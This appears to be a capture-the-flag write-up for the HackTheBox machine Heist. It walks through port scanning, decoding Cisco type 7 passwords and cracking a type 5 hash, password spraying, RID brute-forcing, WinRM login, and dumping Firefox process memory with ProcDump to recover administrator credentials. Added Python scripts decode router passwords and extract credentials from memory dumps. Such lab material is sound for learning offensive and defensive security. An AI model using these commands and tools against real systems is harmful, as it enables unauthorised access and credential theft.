[HackTheBox] Heist

Just another Cisco type 7 / type 5 password and ProcDump leak write-up.

Machine link.

Ippsec Walkthrough.

Footprinting

Open ports

The open ports are 80 (HTTP), 135 and 49669 (MSRPC), 445 (SMB) and 5985 (WinRM):

kali@kali:~$ nmap -p- -v10 -Pn --disable-arp-ping -oN tcp_full.nmap 10.10.10.149
kali@kali:~$ nmap -Pn --disable-arp-ping -sC -sV -v10 -p$(grep -oP '^\d*(?=/)(?=.* open )' tcp_full.nmap |sort -u |tr '\n' ',' |grep -oP '.*(?=,)') -oN nse.nmap 10.10.10.149
[...]
PORT      STATE SERVICE       REASON  VERSION
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-title: Support Login Page
|_Requested resource was login.php
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds? syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[...]

The RPC and SMB services point to a standard Windows host. It is not domain-joined: the NetBIOS name is SUPPORTDESK and it sits in the SupportDesk workgroup (Windows 10 / Server 2019 build 17763, SMBv1 disabled, SMB signing not required):

kali@kali:~$ cme smb 10.10.10.149 -u 'a' -p ''
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\a: STATUS_LOGON_FAILURE

Is my Cisco encryption type okay?

The web server runs on IIS and hosts a support portal advertising 24/7 assistance:

Once logged on as a guest, we’re redirected to an issue:

From there, we have two potential usernames: Hazard and Support Admin. The issue concerns a Cisco router configuration, which we can download as an attachment:

>>>
GET /attachments/config.txt HTTP/1.1
Host: 10.10.10.149

<<<
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

In particular, two type 7 passwords (for rout3r and admin) and one type 5 enable secret are defined.

However, as mentioned in the Cisco documentation "Controlling Switch Access with Passwords and Privilege Levels", these password types are deprecated and should be migrated to type 8 or 9. Likewise, the NSA Cybersecurity Information Sheet "Cisco Password Types: Best Practices" lists types 0, 4 and 7 as deprecated and recommends only type 8 (PBKDF2 with SHA-256):

More precisely, a password stored with an encryption type of:

  • 0 is plain text.

  • 4 is an unsalted SHA-256 hash with a single iteration.

  • 5 is a salted MD5-crypt hash ($1$salt$hash), which can be cracked offline.

  • 7 is a Vigenère-style cipher: each byte is XORed with a byte of a fixed, publicly known key, so it is trivially reversible.

We can decrypt these with cisco7crack, or with the following Python script (originally generated with ChatGPT):

#!/usr/bin/python3
# Cisco type 7 decoder: every password byte is XORed with one byte of a
# fixed, publicly known key; the first two (decimal) digits give the key offset.
import sys

# The full 40-byte Cisco type 7 key, "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"
cisco_seed = [0x64, 0x73, 0x66, 0x64, 0x3B, 0x6B, 0x66, 0x6F, 0x41, 0x2C,
              0x2E, 0x69, 0x79, 0x65, 0x77, 0x72, 0x6B, 0x6C, 0x64, 0x4A,
              0x4B, 0x44, 0x48, 0x53, 0x55, 0x42, 0x73, 0x67, 0x76, 0x63,
              0x61, 0x36, 0x39, 0x38, 0x33, 0x34, 0x6E, 0x63, 0x78, 0x76]

encoded_password = sys.argv[1]
offset = int(encoded_password[:2])       # two decimal digits (00-15): starting key index
encrypted_chars = encoded_password[2:]   # hex pairs, one per password byte
decoded_password = ""
for i in range(0, len(encrypted_chars), 2):
    char_code = int(encrypted_chars[i:i+2], 16)
    decoded_password += chr(char_code ^ cisco_seed[(offset + i // 2) % len(cisco_seed)])
print("Decrypted type 7 password:", decoded_password)

kali@kali$ cisco7crack 0242114B0E143F015F5D1E161713
Encrypted string : 0242114B0E143F015F5D1E161713
Plain string     : $uperP@ssword

kali@kali:~$ python3 cisco7decrypt.py 02375012182C1A1D751618034F36415408
Decrypted type 7 password: Q4)sJu\Y8qz*A3?d

However, neither rout3r:$uperP@ssword nor admin:Q4)sJu\Y8qz*A3?d is valid on the web portal or over SMB.

Regarding the type 5 password in the configuration, we could crack it using john:

kali@kali:~$ echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' |john --wordlist=/usr/share/wordlists/rockyou.txt /dev/stdin
stealth1agent    (?)
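Generalising the two steps above into a check that can be run over any exported IOS configuration, as an added example (this is not code from the original write-up): classify every password-carrying line by its encryption type, decode type 7 values in place with the full 40-byte Cisco key, and pass type 5 hashes through in the form john reads. The config excerpt embedded below is constructed from the relevant lines of the downloaded config.txt plus a type 0 and a type 8 line added for illustration; the type 8 hash is a placeholder, not a real hash.

```python
#!/usr/bin/python3
"""Audit a Cisco IOS configuration for weak password storage types.

Added example, not part of the original write-up. It flags every
password/secret line by its encryption type, decodes type 7 values
in place and hands type 5 ($1$) hashes over in the form john reads.
"""
import re

# The fixed 40-byte Cisco type 7 key: "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"

# Verdicts follow the Cisco and NSA guidance discussed above.
VERDICT = {
    "0": "plain text - deprecated",
    "4": "unsalted single-round SHA-256 - deprecated",
    "5": "MD5-crypt - weak, crack offline",
    "6": "AES reversible - acceptable only where reversibility is required",
    "7": "Vigenere-style XOR - reversible, deprecated",
    "8": "PBKDF2-SHA256 - recommended",
    "9": "scrypt - strong (NSA still prefers type 8)",
}

# "<...> password|secret [<type>] <value>"; a missing type number means type 0.
LINE_RE = re.compile(
    r"^\s*(?P<prefix>.*?\b(?:password|secret))\s+(?:(?P<type>[045-9])\s+)?(?P<value>\S+)\s*$"
)


def decode_type7(value: str) -> str:
    """Reverse a type 7 string: two decimal offset digits, then one hex pair per byte."""
    if len(value) < 4 or len(value) % 2 or not value[:2].isdigit():
        raise ValueError(f"malformed type 7 value: {value!r}")
    offset = int(value[:2])
    data = bytes.fromhex(value[2:])
    return "".join(chr(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)]) for i, b in enumerate(data))


def audit_config(config: str) -> list:
    """Return one finding dict per password-bearing config line."""
    findings = []
    for lineno, line in enumerate(config.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue
        ptype = m.group("type") or "0"
        finding = {"line": lineno, "type": ptype, "verdict": VERDICT[ptype],
                   "context": m.group("prefix").strip()}
        if ptype == "7":
            finding["plaintext"] = decode_type7(m.group("value"))
        elif ptype == "5":
            finding["john"] = m.group("value")  # $1$salt$hash is md5crypt; john autodetects it
        findings.append(finding)
    return findings


# Constructed excerpt: the three real lines from the downloaded config.txt,
# plus a type 0 and a type 8 line (placeholder hash) added for illustration.
SAMPLE_CONFIG = """\
!
service password-encryption
hostname ios-1
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
username legacy password 0 hunter2
username auditor secret 8 $8$placeholderSalt$placeholderHash
security passwords min-length 12
"""

if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        extra = f.get("plaintext") or f.get("john") or ""
        print(f"line {f['line']:>3}  type {f['type']}  {f['verdict']:<55}  {f['context']}  {extra}")
```

Lines such as "service password-encryption" and "security passwords min-length 12" contain the word password but carry no credential, and the regex deliberately ignores them; anything that does match is a finding, and only types 8 and 9 come back with a clean verdict.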

Then we can spray the three recovered passwords against a list of guessable usernames: the two from the router config, the two seen on the portal, and the Windows defaults:

kali@kali:~$ cat users.txt
Administrator
Guest
rout3r
admin
hazard
support admin
support

kali@kali:~$ cat passwords.txt
$uperP@ssword
Q4)sJu\Y8qz*A3?d
stealth1agent

Running nxc once per user in a background subshell (each one trying the whole password list, with --local-auth because the host is not domain-joined, and grep hiding failures and noise) discloses the SupportDesk\hazard:stealth1agent credentials:

kali@kali:~$ while read user; do (nxc smb 10.10.10.149 -u "$user" -p passwords.txt --local-auth |grep -vP '( \[\*\] | STATUS_LOGON_FAILURE |RPC_S_ACCESS_DENIED| Connection refused | ERROR )'&); done < users.txt
SMB                      10.10.10.149    445    SUPPORTDESK      [+] SUPPORTDESK\hazard:stealth1agent

Unfortunately, hazard is not allowed to access any share (the --shares listing comes back empty):

kali@kali:~$ nxc smb 10.10.10.149 -u 'hazard' -p 'stealth1agent' --shares

Chasing WinRM RIDs

However, with these SMB credentials we can enumerate plenty, including the local accounts, by brute-forcing RIDs (the last component of a SID: 500 and 501 are the built-in Administrator and Guest, and accounts created locally start at 1000):

kali@kali:~$ cme smb 10.10.10.149 -u 'hazard' -p 'stealth1agent' --rid-brute
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent
SMB         10.10.10.149    445    SUPPORTDESK      [+] Brute forcing RIDs
SMB         10.10.10.149    445    SUPPORTDESK      500: SUPPORTDESK\Administrator (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      501: SUPPORTDESK\Guest (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      513: SUPPORTDESK\None (SidTypeGroup)
SMB         10.10.10.149    445    SUPPORTDESK      1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      1009: SUPPORTDESK\support (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      1012: SUPPORTDESK\Chase (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      1013: SUPPORTDESK\Jason (SidTypeUser)

So Chase and Jason are two more local users. Re-spraying the three recovered passwords against them shows that Chase reuses the admin's type 7 router password: SupportDesk\chase:Q4)sJu\Y8qz*A3?d is valid!

kali@kali:~$ nxc smb 10.10.10.149 -u 'chase' -p 'Q4)sJu\Y8qz*A3?d' --shares
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\chase:Q4)sJu\Y8qz*A3?d
SMB         10.10.10.149    445    SUPPORTDESK      [*] Enumerated shares
SMB         10.10.10.149    445    SUPPORTDESK      Share           Permissions     Remark
SMB         10.10.10.149    445    SUPPORTDESK      -----           -----------     ------
SMB         10.10.10.149    445    SUPPORTDESK      ADMIN$                          Remote Admin
SMB         10.10.10.149    445    SUPPORTDESK      C$                              Default share
SMB         10.10.10.149    445    SUPPORTDESK      IPC$            READ            Remote IPC

Because WinRM (5985/tcp) is open, we can try to log in to that service as chase:

kali@kali:~$ evil-winrm -i 10.10.10.149 -u 'SupportDesk\chase' -p 'Q4)sJu\Y8qz*A3?d'
*Evil-WinRM* PS C:\Users\Chase\Documents>

And retrieve the user flag:

*Evil-WinRM* PS C:\Users\Chase\Documents> get-content ../desktop/user.txt
cf[...]fe

Privilege escalation

Chasing firefox keys

There is a todo.txt file on the desktop:

*Evil-WinRM* PS C:\Users\Chase\desktop> get-content todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

I didn’t really know what to do with that file, but running WinPEAS on the target reveals that Firefox credentials are stored:

*Evil-WinRM* PS C:\Users\Chase\Documents> upload WinPEASx64.exe
*Evil-WinRM* PS C:\Users\Chase\Documents> ./WinPEASx64.exe > WinPEAS.txt
[...]
Firefox credentials file exists at C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles\77nc64t5.default\key4.db

key4.db only holds the NSS key material that protects saved logins; the encrypted logins themselves live in logins.json in the same profile, and offline decryption tools need both files.

Chasing firefox dumps

Then, reading the notes again, it seems that some kind of regular task is run in the background:

1. Keep checking the issues list.

Therefore an administrator may be logging in to the portal periodically in the background, in which case the admin's credentials would be sitting in the memory of a running browser. Using ProcDump from Sysinternals, we can dump the Firefox processes.

There are currently five Firefox processes running, but ProcDump dumps a single process per invocation. The following ForEach-Object (%) loop writes a full memory dump (-ma) of every firefox process into C:\Windows\Tasks\:

*Evil-WinRM* PS C:\Users\Chase\Documents> upload procdump64.exe
*Evil-WinRM* PS C:\Users\Chase\Documents> (get-process |where-object ProcessName -eq 'firefox').Id | % { ./procdump64.exe -accepteula -ma $_ c:\windows\tasks }
*Evil-WinRM* PS C:\Users\Chase\Documents> (dir C:\Windows\Tasks).Name
firefox.exe_241115_155142.dmp
firefox.exe_241115_155145.dmp
firefox.exe_241115_155146.dmp
firefox.exe_241115_155147.dmp
firefox.exe_241115_155148.dmp

In one of them, strings.exe reveals the admin's credentials :) They are there because the portal's login form submits the username and password as GET query parameters: Firefox keeps the full URL, password included, as a crash-reporter restart argument (MOZ_CRASHREPORTER_RESTART_ARG_1), and the same URL also lands in browser history and in the IIS logs (cs-uri-query). A POST form would not have stopped a memory dump, but it would have kept the password out of URLs.

I limited the number of bytes to be analyzed with the -b option to prevent memory crashes.

*Evil-WinRM* PS C:\Users\Chase\Documents> upload strings64.exe
*Evil-WinRM* PS C:\Users\Chase\Documents> ./strings64.exe -accepteula -n 50 -a -nobanner -b 5000000 C:\Windows\Tasks\firefox.exe_*.dmp |findstr /ri 'password'
[...]
C:\Windows\Tasks\firefox.exe_241115_155147.dmp: MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
C:\Windows\Tasks\firefox.exe_241115_155147.dmp: MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
C:\Windows\Tasks\firefox.exe_241115_155148.dmp: RG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
C:\Windows\Tasks\firefox.exe_241115_155148.dmp: MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
[...]
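The strings + findstr step above finds the line by eye. As an added example that is not part of the original write-up, the following Python does the same parse programmatically: it pulls printable runs out of a raw dump, keeps those that look like a URL carrying a password-style query parameter, and URL-decodes them, so percent-encoded passwords come out intact. It goes beyond the post in one respect: it also scans UTF-16LE strings, which the -a (ASCII-only) option given to strings.exe above skips. The dump bytes embedded below are a constructed stand-in: the first credential is the one found on this box, the second (svc_backup on intranet.example) is invented for the test.

```python
#!/usr/bin/python3
"""Recover web-form credentials from a raw process memory dump.

Added example, not part of the original write-up: a programmatic version
of "strings | findstr password" that also URL-decodes what it finds and
scans UTF-16LE (Windows wide) strings as well as ASCII ones.
"""
import re
from typing import Optional
from urllib.parse import parse_qs

MIN_LEN = 20                                    # like strings -n: minimum run length
ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)
PASSWORD_KEYS = ("pass", "pwd", "secret")       # substrings marking a password parameter
USER_KEYS = ("user", "email", "login", "name")  # substrings marking a username parameter


def printable_runs(dump: bytes):
    """Yield printable ASCII runs, then UTF-16LE runs, as str."""
    for m in ASCII_RUN.finditer(dump):
        yield m.group().decode("ascii")
    for m in WIDE_RUN.finditer(dump):
        yield m.group().decode("utf-16-le")


def parse_credential_url(text: str) -> Optional[dict]:
    """Split '<anything>=<endpoint>?<query>' and return the credential pair, if any."""
    head, _, query = text.partition("?")
    params = parse_qs(query, keep_blank_values=True)   # percent-decodes the values
    pw_key = next((k for k in params if any(t in k.lower() for t in PASSWORD_KEYS)), None)
    if pw_key is None or not params[pw_key][0]:
        return None
    user_key = next((k for k in params
                     if k != pw_key and params[k][0]
                     and any(t in k.lower() for t in USER_KEYS)), None)
    return {
        "endpoint": head.rsplit("=", 1)[-1],   # drop an env-var prefix such as MOZ_..._ARG_1=
        "username": params[user_key][0] if user_key else None,
        "password": params[pw_key][0],
    }


def extract_form_credentials(dump: bytes) -> list:
    """Return de-duplicated credential dicts found anywhere in the dump."""
    found, seen = [], set()
    for text in printable_runs(dump):
        if "?" not in text:
            continue
        cred = parse_credential_url(text)
        if cred is None:
            continue
        key = (cred["endpoint"], cred["username"], cred["password"])
        if key not in seen:
            seen.add(key)
            found.append(cred)
    return found


# Constructed stand-in for a firefox.exe .dmp: an ASCII environment block
# holding the credential seen on this box, a UTF-16LE URL with an invented
# account and a percent-encoded password, and an unrelated request line.
SAMPLE_DUMP = (
    b"\x00\x00MOZ_CRASHREPORTER_RESTART_ARG_0=C:\\Program Files\\Mozilla Firefox\\firefox.exe\x00"
    b"\x01\x02MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb"
    b"&login_password=4dD!5}x/re8]FBuZ&login=\x00\x00\xff\xfe"
    + "https://intranet.example/auth?user=svc_backup&pwd=p%40ss%26word".encode("utf-16-le")
    + b"\x00\x00GET /static/app.js?v=3 HTTP/1.1\x00"
)

if __name__ == "__main__":
    for cred in extract_form_credentials(SAMPLE_DUMP):
        print(f"{cred['endpoint']}: {cred['username']} / {cred['password']}")
```

Run it against a real dump with open(path, "rb").read(); the unrelated request line in the sample shows that a "?" alone is not enough to produce a finding, only a query string with a password-style key is.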

GG WP!

kali@kali:~$ evil-winrm -i 10.10.10.149 -u 'Administrator' -p '4dD!5}x/re8]FBuZ'
*Evil-WinRM* PS C:\Users\Administrator\Documents> get-content ../desktop/root.txt
ff[...]8f
